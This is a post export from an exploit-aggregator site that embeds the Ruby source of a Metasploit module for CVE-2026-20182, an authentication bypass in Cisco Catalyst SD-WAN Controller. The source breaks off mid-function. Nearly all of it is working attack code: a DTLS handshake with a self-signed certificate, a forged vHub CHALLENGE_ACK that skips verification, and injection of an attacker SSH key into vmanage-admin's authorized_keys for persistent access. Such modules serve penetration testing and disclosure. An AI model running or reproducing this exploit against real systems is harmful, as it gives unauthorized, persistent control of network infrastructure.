{"id":54918,"date":"2026-05-15T14:35:49","date_gmt":"2026-05-15T14:35:49","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=54918"},"modified":"2026-05-15T14:35:49","modified_gmt":"2026-05-15T14:35:49","slug":"cisco-catalyst-sd-wan-controller-vhub-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=54918","title":{"rendered":"Cisco Catalyst SD-WAN Controller vHub Authentication Bypass_MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-15T19:28:09&#8243;,&#8221;description&#8221;:&#8221;This module exploits an authentication bypass vulnerability CVE-2026-20182 in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane service performs no certificate or credential verification for connecting peers that claim to be a vHub&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-15T19:01:42&#8243;,&#8221;modified&#8221;:&#8221;2026-05-15T19:01:42&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Cisco Catalyst SD-WAN Controller vHub Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-20182&#8243;],&#8221;sourceData&#8221;:&#8221;# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire &#8216;fiddle&#8217;\\nrequire &#8216;ipaddr&#8217;\\nrequire &#8216;base64&#8217;\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n  include Msf::Exploit::Remote::Udp\\n  include Msf::Auxiliary::Report\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Cisco Catalyst SD-WAN Controller vHub Authentication Bypass&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits an authentication bypass vulnerability (CVE-2026-20182)\\n          in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane\\n          service performs no certificate or credential verification for connecting peers\\n          that claim to be a vHub (device type 2). The vbond_proc_challenge_ack() function\\n          implements device-type-specific verification through a series of conditional\\n          blocks, but contains no code path for device type 2 (vHub). After a DTLS\\n          handshake using any self-signed certificate, an attacker sends a CHALLENGE_ACK\\n          (msg_type=9) with the vHub device type encoded in the protocol header. The\\n          function falls through all verification checks and unconditionally sets\\n          peer-\\u003eauthenticated = 1.\\n\\n          This module leverages the authentication bypass to inject an attacker-controlled\\n          SSH public key into the vmanage-admin user&#8217;s authorized_keys file via a\\n          VMANAGE_TO_PEER message (msg_type=14), providing persistent SSH access to the\\n          controller over the NETCONF service (TCP port 830).\\n\\n          Affected versions: Cisco Catalyst SD-WAN Controller 20.12.6.1 and earlier.\\n          Consult Cisco&#8217;s security advisory for a complete list of affected versions\\n          and patches.\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;sfewer-r7&#8217;, # Vulnerability discovery\\n          &#8216;Crypto-Cat&#8217;, # Vulnerability discovery and Metasploit module\\n        ],\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2026-20182&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/sec.cloudapps.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-sdwan-rpa2-v69WY2SW&#8217;], # Vendor advisory\\n          [&#8216;URL&#8217;, &#8216;https:\/\/blog.talosintelligence.com\/sd-wan-ongoing-exploitation\/&#8217;], # Talos blog\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.rapid7.com\/blog\/post\/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed\/&#8217;] # Rapid7 blog\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-05-07&#8217;,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [],\\n          &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        Opt::RPORT(12346),\\n        OptInt.new(&#8216;DOMAIN_ID&#8217;, [true, &#8216;SD-WAN domain ID&#8217;, 1]),\\n        OptInt.new(&#8216;SITE_ID&#8217;, [true, &#8216;SD-WAN site ID&#8217;, 100]),\\n        OptPath.new(&#8216;SSH_PUBLIC_KEY_FILE&#8217;, [false, &#8216;Path to an existing SSH public key file to inject&#8217;])\\n      ]\\n    )\\n  end\\n\\n  def check\\n    result = perform_auth_bypass(ssh_key_inject: false, silent: !datastore[&#8216;VERBOSE&#8217;])\\n    if result == :vulnerable\\n      Msf::Exploit::CheckCode::Vulnerable(&#8216;Authentication bypass succeeded &#8211; vHub CHALLENGE_ACK accepted without verification&#8217;)\\n    elsif result == :detected\\n      Msf::Exploit::CheckCode::Detected(&#8216;DTLS service detected but bypass could not be confirmed&#8217;)\\n    else\\n      Msf::Exploit::CheckCode::Unknown(&#8216;Could not determine vulnerability status&#8217;)\\n    end\\n  rescue ::StandardError =\\u003e e\\n    vprint_error(\\&#8221;Check failed: #{e.message}\\&#8221;)\\n    Msf::Exploit::CheckCode::Unknown(\\&#8221;Check failed: #{e.message}\\&#8221;)\\n  end\\n\\n  def run\\n    result = perform_auth_bypass(ssh_key_inject: true, silent: false)\\n    if result == :vulnerable\\n      report_vuln(\\n        host: rhost,\\n        port: rport,\\n        proto: &#8216;udp&#8217;,\\n        name: name,\\n        info: &#8216;Authentication bypass confirmed &#8211; vHub CHALLENGE_ACK accepted without verification&#8217;,\\n        refs: references\\n      )\\n      print_good(&#8216;Authentication bypass and SSH key injection completed!&#8217;)\\n    else\\n      fail_with(Failure::UnexpectedReply, &#8216;Exploit failed&#8217;)\\n    end\\n  end\\n\\n  private\\n\\n  def perform_auth_bypass(ssh_key_inject:, silent: false)\\n    ssl = nil\\n    ctx = nil\\n    udp_sock = nil\\n\\n    begin\\n      # Phase 1: DTLS handshake\\n      ssl, ctx, udp_sock, rbio, wbio = phase1_dtls_handshake(silent: silent)\\n      return :safe unless ssl\\n\\n      # Phase 2: Receive CHALLENGE\\n      return :detected unless phase2_receive_challenge(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n      # Phase 3: Send CHALLENGE_ACK (the bypass)\\n      return :detected unless phase3_send_challenge_ack(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n      # Phase 4: Observe result\\n      return :detected unless phase4_observe_result(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n      # Phase 5: Send Hello\\n      return :detected unless phase5_send_hello(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n      # Phase 6: SSH key injection\\n      phase6_ssh_key_inject(ssl, rbio, wbio, udp_sock, silent: silent) if ssh_key_inject\\n\\n      :vulnerable\\n    ensure\\n      cleanup_dtls(ssl, ctx, udp_sock)\\n    end\\n  end\\n\\n  def phase1_dtls_handshake(silent: false)\\n    print_status(&#8216;Phase 1: DTLS handshake with self-signed certificate&#8217;) unless silent\\n\\n    load_openssl_ffi\\n\\n    # Generate self-signed certificate (in-memory, no files written to disk)\\n    cert_der, key_der = generate_self_signed_cert\\n\\n    # Create UDP socket\\n    udp_sock = Rex::Socket::Udp.create(\\n      &#8216;PeerHost&#8217; =\\u003e rhost,\\n      &#8216;PeerPort&#8217; =\\u003e rport,\\n      &#8216;Context&#8217; =\\u003e { &#8216;Msf&#8217; =\\u003e framework, &#8216;MsfExploit&#8217; =\\u003e self }\\n    )\\n\\n    # Create DTLS context\\n    method_ptr = @f_dtls_client_method.call\\n    fail_with(Failure::Unknown, &#8216;DTLS_client_method() returned NULL&#8217;) if method_ptr.null?\\n\\n    ctx = @f_ssl_ctx_new.call(method_ptr)\\n    fail_with(Failure::Unknown, &#8216;SSL_CTX_new() returned NULL&#8217;) if ctx.null?\\n\\n    # Disable peer certificate verification\\n    @f_ssl_ctx_set_verify.call(ctx, SSL_VERIFY_NONE, Fiddle::NULL)\\n\\n    # Load certificate and key from in-memory DER data\\n    ret = @f_ssl_ctx_use_certificate_asn1.call(ctx, cert_der.bytesize, cert_der)\\n    fail_with(Failure::Unknown, \\&#8221;SSL_CTX_use_certificate_ASN1 failed (ret=#{ret})\\&#8221;) unless ret == 1\\n\\n    ret = @f_ssl_ctx_use_privatekey_asn1.call(EVP_PKEY_RSA, ctx, key_der, key_der.bytesize)\\n    fail_with(Failure::Unknown, \\&#8221;SSL_CTX_use_PrivateKey_ASN1 failed (ret=#{ret})\\&#8221;) unless ret == 1\\n\\n    # Create SSL object\\n    ssl = @f_ssl_new.call(ctx)\\n    fail_with(Failure::Unknown, &#8216;SSL_new() returned NULL&#8217;) if ssl.null?\\n\\n    # Create memory BIOs\\n    mem_method = @f_bio_s_mem.call\\n    rbio = @f_bio_new.call(mem_method)\\n    wbio = @f_bio_new.call(mem_method)\\n    fail_with(Failure::Unknown, &#8216;BIO_new() returned NULL&#8217;) if rbio.null? || wbio.null?\\n\\n    # Attach BIOs to SSL (SSL takes ownership)\\n    @f_ssl_set_bio.call(ssl, rbio, wbio)\\n\\n    # Perform DTLS handshake\\n    do_dtls_handshake(ssl, rbio, wbio, udp_sock)\\n\\n    print_status(&#8216;DTLS handshake succeeded (self-signed cert accepted)&#8217;) unless silent\\n\\n    [ssl, ctx, udp_sock, rbio, wbio]\\n  rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED =\\u003e e\\n    print_error(\\&#8221;Connection failed: #{e.message}\\&#8221;) unless silent\\n    cleanup_dtls(ssl, ctx, udp_sock)\\n    [nil, nil, nil, nil, nil]\\n  rescue Fiddle::DLError =\\u003e e\\n    print_error(\\&#8221;OpenSSL FFI error: #{e.message}\\&#8221;) unless silent\\n    cleanup_dtls(ssl, ctx, udp_sock)\\n    [nil, nil, nil, nil, nil]\\n  end\\n\\n  def phase2_receive_challenge(ssl, rbio, wbio, udp_sock, silent: false)\\n    print_status(&#8216;Phase 2: Waiting for CHALLENGE from server&#8217;) unless silent\\n\\n    hdr, body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 15)\\n    unless hdr\\n      print_error(&#8216;No CHALLENGE received from server&#8217;) unless silent\\n      return false\\n    end\\n\\n    if hdr_msg_type(hdr) != MSG_CHALLENGE\\n      print_error(\\&#8221;Expected CHALLENGE (type=#{MSG_CHALLENGE}), got #{msg_name(hdr_msg_type(hdr))} (type=#{hdr_msg_type(hdr)})\\&#8221;) unless silent\\n      return false\\n    end\\n\\n    print_status(\\&#8221;CHALLENGE received (#{body.bytesize} bytes of challenge data)\\&#8221;) unless silent\\n    true\\n  end\\n\\n  def phase3_send_challenge_ack(ssl, _rbio, wbio, udp_sock, silent: false)\\n    print_status(&#8216;Phase 3: Sending CHALLENGE_ACK as vHub (authentication bypass)&#8217;) unless silent\\n\\n    ack_body = build_challenge_ack_body\\n    send_message(ssl, wbio, udp_sock, MSG_CHALLENGE_ACK, ack_body)\\n\\n    true\\n  end\\n\\n  def phase4_observe_result(ssl, rbio, wbio, udp_sock, silent: false)\\n    print_status(&#8216;Phase 4: Waiting for server response to CHALLENGE_ACK&#8217;) unless silent\\n\\n    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)\\n    if hdr\\n      mtype = hdr_msg_type(hdr)\\n      if mtype == MSG_TEAR_DOWN\\n        print_warning(&#8216;TEAR_DOWN received &#8211; server rejected the CHALLENGE_ACK&#8217;) unless silent\\n        return false\\n      end\\n      print_status(\\&#8221;Server responded with: #{msg_name(mtype)}\\&#8221;) unless silent\\n    else\\n      print_warning(&#8216;No immediate response (server may be waiting for our Hello)&#8217;) unless silent\\n    end\\n\\n    true\\n  end\\n\\n  def phase5_send_hello(ssl, rbio, wbio, udp_sock, silent: false)\\n    print_status(&#8216;Phase 5: Sending Hello as authenticated peer&#8217;) unless silent\\n\\n    hello_body = build_hello_body\\n    send_message(ssl, wbio, udp_sock, MSG_HELLO, hello_body)\\n\\n    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)\\n    if hdr\\n      mtype = hdr_msg_type(hdr)\\n      if mtype == MSG_HELLO\\n        print_good(&#8216;Hello response received &#8211; authenticated as vHub peer&#8217;) unless silent\\n        return true\\n      elsif mtype == MSG_TEAR_DOWN\\n        print_warning(&#8216;TEAR_DOWN received after Hello&#8217;) unless silent\\n      else\\n        print_warning(\\&#8221;Server responded with: #{msg_name(mtype)}\\&#8221;) unless silent\\n      end\\n    else\\n      print_warning(&#8216;No Hello response&#8217;) unless silent\\n    end\\n\\n    false\\n  end\\n\\n  def phase6_ssh_key_inject(ssl, rbio, wbio, udp_sock, silent: false)\\n    print_status(&#8216;Phase 6: Injecting SSH public key into vmanage-admin authorized_keys&#8217;) unless silent\\n\\n    ssh_pubkey, ssh_privkey_pem = resolve_ssh_key(silent: silent)\\n\\n    # Build SSH key injection body (769 bytes)\\n    key_body = build_ssh_inject_body(ssh_pubkey)\\n\\n    send_message(ssl, wbio, udp_sock, MSG_VMANAGE_TO_PEER, key_body)\\n\\n    if datastore[&#8216;SSH_PUBLIC_KEY_FILE&#8217;]\\n      # If we are using an existing key supplied by the user, just show how to connect to the NETCONF service.\\n      print_good(\\&#8221;Use: ssh -i \\u003cSSH_PRIVATE_KEY_FILE\\u003e vmanage-admin@#{rhost} -p 830\\&#8221;) unless silent\\n    else\\n      # Write SSH key file to loot\\n      privkey_path = store_loot(\\n        &#8216;cisco.sdwan.sshkey&#8217;,\\n        &#8216;application\/x-pem-file&#8217;,\\n        rhost,\\n        ssh_privkey_pem,\\n        &#8216;sdwan_ssh_key.pem&#8217;,\\n        &#8216;SSH private key for vmanage-admin access&#8217;\\n      )\\n      ::File.chmod(0o600, privkey_path)\\n\\n      unless silent\\n        print_status(\\&#8221;SSH private key saved to loot: #{privkey_path}\\&#8221;)\\n        # Provide connection instructions\\n        print_good(&#8216;Connect to NETCONF via:&#8217;)\\n        print_line(\\&#8221;ssh -i #{privkey_path} vmanage-admin@#{rhost} -p 830\\&#8221;)\\n      end\\n    end\\n\\n    # Check for response\\n    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5)\\n    if hdr\\n      mtype = hdr_msg_type(hdr)\\n      if mtype == MSG_REGISTER_TO_VMANAGE\\n        print_status(&#8216;Server responded with: REGISTER_TO_VMANAGE (key has been injected)&#8217;) unless silent\\n      else\\n        print_warning(\\&#8221;Server responded with: #{msg_name(mtype)}\\&#8221;) unless silent\\n      end\\n    else\\n      print_warning(&#8216;No response to key injection&#8217;) unless silent\\n    end\\n  end\\n\\n  #\\n  # vdaemon protocol constants\\n  #\\n\\n  MSG_HELLO = 0x05\\n  MSG_CHALLENGE = 0x08\\n  MSG_CHALLENGE_ACK = 0x09\\n  MSG_TEAR_DOWN = 0x0B\\n  MSG_REGISTER_TO_VMANAGE = 0x0D\\n  MSG_VMANAGE_TO_PEER = 0x0E\\n\\n  # Device type encoded in the upper nibble of header byte 1.\\n  # Claiming vHub (type 2) causes vbond_proc_challenge_ack() to fall through\\n  # all verification branches and unconditionally set peer-\\u003eauthenticated = 1.\\n  DEV_VHUB = 2\\n\\n  HDR_FLAGS = 0xA0\\n\\n  TLV_UUID = 0x0006\\n  TLV_INSTANCE_ID = 0x0013\\n  TLV_MAX_INSTANCES = 0x0014\\n  TLV_FLAG_18 = 0x0018\\n  TLV_FLAG_19 = 0x0019\\n  TLV_SERVER_KEY = 0x0032\\n  TLV_NUM_VSMARTS = 0x0021\\n  TLV_NUM_VMANAGES = 0x0022\\n\\n  MSG_NAMES = {\\n    0 =\\u003e &#8216;NEW_CHALLENGE_ACK&#8217;,\\n    1 =\\u003e &#8216;Register&#8217;,\\n    5 =\\u003e &#8216;Hello&#8217;,\\n    7 =\\u003e &#8216;Data&#8217;,\\n    8 =\\u003e &#8216;CHALLENGE&#8217;,\\n    9 =\\u003e &#8216;CHALLENGE_ACK&#8217;,\\n    10 =\\u003e &#8216;CHALLENGE_ACK_ACK&#8217;,\\n    11 =\\u003e &#8216;TEAR_DOWN&#8217;,\\n    12 =\\u003e &#8216;DELETE_VSMARTS_SERIAL&#8217;,\\n    13 =\\u003e &#8216;REGISTER_TO_VMANAGE&#8217;,\\n    14 =\\u003e &#8216;VMANAGE_TO_PEER&#8217;,\\n    15 =\\u003e &#8216;submsg&#8217;\\n  }.freeze\\n\\n  #\\n  # Protocol encoding\/decoding\\n  #\\n\\n  def build_header(msg_type)\\n    byte0 = msg_type \\u0026 0x0F\\n    byte1 = (DEV_VHUB \\u0026 0x0F) \\u003c\\u003c 4\\n    domain_id = datastore[&#8216;DOMAIN_ID&#8217;]\\n    site_id = datastore[&#8216;SITE_ID&#8217;]\\n    [byte0, byte1, HDR_FLAGS, 0x00, domain_id, site_id].pack(&#8216;CCCCN2&#8217;)\\n  end\\n\\n  def hdr_msg_type(hdr_bytes)\\n    hdr_bytes.getbyte(0) \\u0026 0x0F\\n  end\\n\\n  def msg_name(type)\\n    MSG_NAMES.fetch(type) { format(&#8216;Unknown(0x%02X)&#8217;, type) }\\n  end\\n\\n  def send_message(ssl, wbio, udp_sock, msg_type, body = &#8221;.b)\\n    header = build_header(msg_type)\\n    message = header + body\\n    vprint_status(\\&#8221;Sending #{msg_name(msg_type)} (#{message.bytesize} bytes)\\&#8221;)\\n    dtls_send(ssl, wbio, udp_sock, message)\\n  end\\n\\n  def recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)\\n    data = dtls_recv(ssl, rbio, wbio, udp_sock, timeout: timeout)\\n    return [nil, nil] unless data\\n    return [nil, nil] if data.bytesize \\u003c 12\\n\\n    hdr = data[0, 12]\\n    body = data[12..] || &#8221;.b\\n    mtype = hdr_msg_type(hdr)\\n    vprint_status(\\&#8221;Received #{msg_name(mtype)} (#{data.bytesize} bytes)\\&#8221;)\\n    [hdr, body]\\n  end\\n\\n  #\\n  # Message body builders\\n  #\\n\\n  def build_challenge_ack_body\\n    uuid = format(\\n      &#8216;%\\u003ca\\u003e08x-%\\u003cb\\u003e04x-%\\u003cc\\u003e04x-%\\u003cd\\u003e04x-%\\u003ce\\u003e012x&#8217;,\\n      a: rand(0xffffffff), b: rand(0xffff), c: rand(0xffff),\\n      d: rand(0xffff), e: rand(0xffffffffffff)\\n    )\\n    server_key = Rex::Text.rand_text_alphanumeric(32)\\n\\n    tlvs = [\\n      build_tlv(TLV_INSTANCE_ID, [0].pack(&#8216;n&#8217;)),\\n      build_tlv(TLV_MAX_INSTANCES, [1].pack(&#8216;n&#8217;)),\\n      build_tlv(TLV_FLAG_18, [1].pack(&#8216;C&#8217;)),\\n      build_tlv(TLV_FLAG_19, [0].pack(&#8216;C&#8217;)),\\n      build_tlv(TLV_UUID, uuid),\\n      build_tlv(TLV_SERVER_KEY, server_key)\\n    ]\\n\\n    buf = [0, 0].pack(&#8216;CC&#8217;) # verified_status=0, hardware_flag=0\\n    buf \\u003c\\u003c [tlvs.size].pack(&#8216;C&#8217;)\\n    buf \\u003c\\u003c tlvs.join\\n    buf\\n  end\\n\\n  def build_hello_body\\n    buf = &#8221;.b\\n\\n    buf \\u003c\\u003c [0x00, 0x00, 0x00, 0x00].pack(&#8216;CCCC&#8217;) # preamble, is_dummy=false\\n    buf \\u003c\\u003c [0x0002].pack(&#8216;n&#8217;)                      # address family: AF_INET\\n    buf \\u003c\\u003c IPAddr.new(rhost, Socket::AF_INET).hton # IP address\\n    buf \\u003c\\u003c [rport].pack(&#8216;n&#8217;)                       # port\\n    buf \\u003c\\u003c [1].pack(&#8216;N&#8217;)                           # color\\n    buf \\u003c\\u003c (\\&#8221;\\\\x00\\&#8221; * 20)                           # label\/key padding\\n\\n    buf \\u003c\\u003c [10_000, 60_000].pack(&#8216;N2&#8217;) # hello_interval_ms, hello_tolerance_ms\\n\\n    tlv_vsmarts = build_tlv(TLV_NUM_VSMARTS, [0x00].pack(&#8216;C&#8217;))\\n    tlv_vmanages = build_tlv(TLV_NUM_VMANAGES, [0x00].pack(&#8216;C&#8217;))\\n    buf \\u003c\\u003c [2].pack(&#8216;C&#8217;)\\n    buf \\u003c\\u003c tlv_vsmarts\\n    buf \\u003c\\u003c tlv_vmanages\\n\\n    buf\\n  end\\n\\n  def build_tlv(type, value)\\n    [type, value.bytesize].pack(&#8216;n2&#8217;) + value.b\\n  end\\n\\n  def build_ssh_inject_body(ssh_pubkey)\\n    # Leading newline ensures key appends cleanly regardless of whether\\n    # authorized_keys ends with a newline. Trailing newline for consistency.\\n    key_buf = \\&#8221;\\\\n\\&#8221;.b + ssh_pubkey.b\\n    key_buf \\u003c\\u003c \\&#8221;\\\\n\\&#8221;.b unless key_buf.end_with?(\\&#8221;\\\\n\\&#8221;.b)\\n    key_buf \\u003c\\u003c \\&#8221;\\\\x00\\&#8221;.b # null-terminate for fputs()\\n    key_buf \\u003c\\u003c (\\&#8221;\\\\x00\\&#8221;.b * (768 &#8211; key_buf.bytesize)) if key_buf.bytesize \\u003c 768\\n    key_buf \\u003c\\u003c [0].pack(&#8216;C&#8217;) # TLV count = 0\\n    key_buf\\n  end\\n\\n  #\\n  # Certificate and SSH key helpers\\n  #\\n\\n  def generate_self_signed_cert\\n    key = OpenSSL::PKey::RSA.new(2048)\\n    cert = OpenSSL::X509::Certificate.new\\n\\n    cert.version = 2\\n    cert.serial = rand(1..0xFFFFFFFF)\\n    cert.subject = OpenSSL::X509::Name.parse(&#8216;\/CN=\/O=\/C=&#8217;)\\n    cert.issuer = cert.subject\\n    cert.public_key = key\\n    cert.not_before = Time.now &#8211; 60\\n    cert.not_after = Time.now + (365 * 86_400)\\n\\n    cert.sign(key, OpenSSL::Digest.new(&#8216;SHA256&#8217;))\\n\\n    [cert.to_der, key.to_der]\\n  end\\n\\n  def resolve_ssh_key(silent: false)\\n    if datastore[&#8216;SSH_PUBLIC_KEY_FILE&#8217;]\\n      pubkey = File.read(datastore[&#8216;SSH_PUBLIC_KEY_FILE&#8217;]).strip\\n      print_status(\\&#8221;Using SSH public key from #{datastore[&#8216;SSH_PUBLIC_KEY_FILE&#8217;]}\\&#8221;) unless silent\\n      return [pubkey, nil]\\n    end\\n\\n    # Generate new RSA keypair\\n    print_status(&#8216;Generating RSA 2048-bit SSH keypair&#8217;) unless silent\\n    key = OpenSSL::PKey::RSA.new(2048)\\n\\n    pubkey_str = build_openssh_pubkey(key)\\n    privkey_pem = key.to_pem\\n\\n    [pubkey_str, privkey_pem]\\n  end\\n\\n  def build_openssh_pubkey(key)\\n    e_bytes = bn_to_bytes(key.e)\\n    n_bytes = bn_to_bytes(key.n)\\n\\n    # Prepend 0x00 if MSB is set (two&#8217;s complement sign bit)\\n    e_bytes = \\&#8221;\\\\x00\\&#8221;.b + e_bytes if e_bytes.getbyte(0) \\u0026 0x80 != 0\\n    n_bytes = \\&#8221;\\\\x00\\&#8221;.b + n_bytes if n_bytes.getbyte(0) \\u0026 0x80 != 0\\n\\n    blob = ssh_string(&#8216;ssh-rsa&#8217;) + ssh_string(e_bytes) + ssh_string(n_bytes)\\n    \\&#8221;ssh-rsa #{Base64.strict_encode64(blob)}\\&#8221;\\n  end\\n\\n  def ssh_string(data)\\n    data = data.b if data.respond_to?(:b)\\n    [data.bytesize].pack(&#8216;N&#8217;) + data\\n  end\\n\\n  def bn_to_bytes(bn)\\n    hex = bn.to_s(16)\\n    hex = \\&#8221;0#{hex}\\&#8221; if hex.length.odd?\\n    [hex].pack(&#8216;H*&#8217;)\\n  end\\n\\n  #\\n  # DTLS transport via Fiddle (OpenSSL C API)\\n  #\\n  # Ruby&#8217;s OpenSSL bindings do not support DTLS. We use Fiddle to call the\\n  # OpenSSL C API directly with memory BIOs to drive the DTLS 1.2 handshake.\\n  #\\n\\n  # OpenSSL constants for Fiddle FFI\\n  SSL_VERIFY_NONE = 0\\n  EVP_PKEY_RSA = 6\\n  SSL_ERROR_WANT_READ = 2\\n  SSL_ERROR_WANT_WRITE = 3\\n  SSL_ERROR_ZERO_RETURN = 6\\n  BIO_CTRL_PENDING = 10\\n  DTLS_CTRL_HANDLE_TIMEOUT = 106\\n\\n  HANDSHAKE_TIMEOUT = 5\\n  MAX_HANDSHAKE_RETRIES = 10\\n  RECV_BUF_SIZE = 65_536\\n\\n  def load_openssl_ffi\\n    return if @ffi_loaded\\n\\n    libssl = load_native_lib(&#8216;ssl&#8217;)\\n    libcrypto = load_native_lib(&#8216;crypto&#8217;)\\n\\n    # libssl functions\\n    @f_dtls_client_method = bind_function(libssl, &#8216;DTLS_client_method&#8217;, [], Fiddle::TYPE_VOIDP)\\n    @f_ssl_ctx_new = bind_function(libssl, &#8216;SSL_CTX_new&#8217;, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)\\n    @f_ssl_ctx_set_verify = bind_function(libssl, &#8216;SSL_CTX_set_verify&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n    @f_ssl_ctx_use_certificate_asn1 = bind_function(libssl, &#8216;SSL_CTX_use_certificate_ASN1&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)\\n    @f_ssl_ctx_use_privatekey_asn1 = bind_function(libssl, &#8216;SSL_CTX_use_PrivateKey_ASN1&#8217;, [Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_LONG], Fiddle::TYPE_INT)\\n    @f_ssl_new = bind_function(libssl, &#8216;SSL_new&#8217;, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)\\n    @f_ssl_set_bio = bind_function(libssl, &#8216;SSL_set_bio&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n    @f_ssl_connect = bind_function(libssl, &#8216;SSL_connect&#8217;, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)\\n    @f_ssl_read = bind_function(libssl, &#8216;SSL_read&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n    @f_ssl_write = bind_function(libssl, &#8216;SSL_write&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n    @f_ssl_get_error = bind_function(libssl, &#8216;SSL_get_error&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n    @f_ssl_free = bind_function(libssl, &#8216;SSL_free&#8217;, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n    @f_ssl_ctx_free = bind_function(libssl, &#8216;SSL_CTX_free&#8217;, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n    @f_ssl_ctrl = bind_function(libssl, &#8216;SSL_ctrl&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP], Fiddle::TYPE_LONG)\\n\\n    # libcrypto functions\\n    @f_bio_new = bind_function(libcrypto, &#8216;BIO_new&#8217;, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)\\n    @f_bio_s_mem = bind_function(libcrypto, &#8216;BIO_s_mem&#8217;, [], Fiddle::TYPE_VOIDP)\\n    @f_bio_read = bind_function(libcrypto, &#8216;BIO_read&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n    @f_bio_write = bind_function(libcrypto, &#8216;BIO_write&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n    @f_bio_ctrl = bind_function(libcrypto, &#8216;BIO_ctrl&#8217;, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP], Fiddle::TYPE_LONG)\\n    @f_err_clear_error = bind_function(libcrypto, &#8216;ERR_clear_error&#8217;, [], Fiddle::TYPE_VOID)\\n    @f_err_get_error = bind_function(libcrypto, &#8216;ERR_get_error&#8217;, [], Fiddle::TYPE_LONG)\\n    @f_err_error_string_n = bind_function(libcrypto, &#8216;ERR_error_string_n&#8217;, [Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP, Fiddle::TYPE_SIZE_T], Fiddle::TYPE_VOID)\\n\\n    @recv_buf = Fiddle::Pointer.malloc(RECV_BUF_SIZE, Fiddle::RUBY_FREE)\\n    @ffi_loaded = true\\n\\n    vprint_status(&#8216;OpenSSL FFI bindings loaded successfully&#8217;)\\n  end\\n\\n  def load_native_lib(name)\\n    candidates = case RUBY_PLATFORM\\n                 when \/mingw|mswin|cygwin\/\\n                   bin = RbConfig::CONFIG[&#8216;bindir&#8217;]\\n                   arch_dir = RbConfig::CONFIG[&#8216;archdir&#8217;]\\n                   site_arch = RbConfig::CONFIG[&#8216;sitearchdir&#8217;]\\n                   paths = []\\n                   [arch_dir, site_arch, bin].compact.uniq.each do |dir|\\n                   